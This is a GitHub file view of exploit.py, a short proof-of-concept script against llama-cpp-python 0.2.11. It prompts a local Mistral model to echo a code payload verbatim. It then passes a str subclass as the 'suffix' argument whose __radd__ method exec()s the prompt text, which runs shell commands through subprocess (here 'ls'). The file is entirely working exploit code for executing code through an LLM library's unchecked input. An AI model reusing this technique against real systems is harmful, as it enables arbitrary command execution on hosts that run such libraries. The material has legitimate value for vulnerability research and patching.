-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
48 lines (40 loc) · 1.1 KB
/
exploit.py
File metadata and controls
48 lines (40 loc) · 1.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from llama_cpp import Llama
n_ctx = 4096
llm = Llama(model_path='mistral-7b-v0.1.Q5_K_M.gguf', n_ctx=n_ctx, verbose=False)
#
# code payload
#
code = '''import subprocess
value = subprocess.check_output('ls', shell=True).decode()'''
code_tokens = llm.tokenize(code.encode())
#
# prompt
#
prompt = f'''You just write Python code exactly as provided by User without any modification, explanations or comments. You are short and concise.
<conversation>
Code for function `analyze_data`:
{code}
</conversation>
Return the updated code:
'''
#
# use suffix for exploiting llama_cpp
# llama-cpp-python==0.2.11 does not check type of suffix
#
class SuffixExploit(str):
def __radd__(self, other: str) -> str:
# execute exploit code
globlas_ = {}
locals_ = {}
exec(other, globlas_, locals_)
print('exploit:')
print(locals_['value'])
# return other without suffix
return other
#
# run
#
suffix_exploit = SuffixExploit()
max_tokens = len(code_tokens)
output = llm(prompt, suffix=suffix_exploit, temperature=0.1, max_tokens=max_tokens, echo=False)
print(output)